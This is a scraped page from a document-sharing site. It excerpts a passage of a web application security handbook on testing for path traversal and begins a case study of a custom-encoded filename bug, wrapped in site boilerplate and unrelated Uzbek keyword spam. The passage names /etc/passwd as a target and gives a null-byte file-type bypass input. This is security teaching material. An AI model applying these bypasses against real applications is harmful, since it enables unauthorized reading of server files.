The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


sequence bypasses don’t enable you to access



Download 5,76 Mb.
Pdf ko'rish
bet596/875
Sana01.01.2022
Hajmi5,76 Mb.
#293004
1   ...   592   593   594   595   596   597   598   599   ...   875
Bog'liq
3794 1008 4334

sequence bypasses don’t enable you to access 

/etc/passwd



, probe

whether any file type filtering is implemented and can be bypassed, by

requesting

diagram1.jpg%00.jpg



Working entirely within the start directory defined by the application, try to

probe to understand all of the filters being implemented, and see whether

each can be bypassed individually with the techniques described. 



Of course, if you have white box access to the application, then your task



is much easier, because you can systematically work through different

types of input and verify conclusively what filename (if any) is actually

reaching the file system.

Coping with Custom Encoding

Probably the craziest path traversal bug that the authors have encountered

involved a custom encoding scheme for filenames that were ultimately han-

dled in an unsafe way, and demonstrated how obfuscation provides no substi-

tute for security.

The application contained some workflow functionality that enabled users

to upload and download files. The request performing the upload supplied a

filename parameter that was vulnerable to a path traversal attack when writ-

ing the file. When a file had been successfully uploaded, the application pro-

vided users with a URL to download it again. There were two important

caveats:

■■

The application verified whether the file to be written already existed,



and if so, refused to overwrite it.

■■

The URLs generated for downloading users’ files were represented



using a bespoke obfuscation scheme — this appeared to be a cus-

tomized form of Base64-encoding, in which a different character set was

employed at each position of the encoded filename.


Download 5,76 Mb.

Do'stlaringiz bilan baham:
1   ...   592   593   594   595   596   597   598   599   ...   875



Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling
kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha

yuklab olish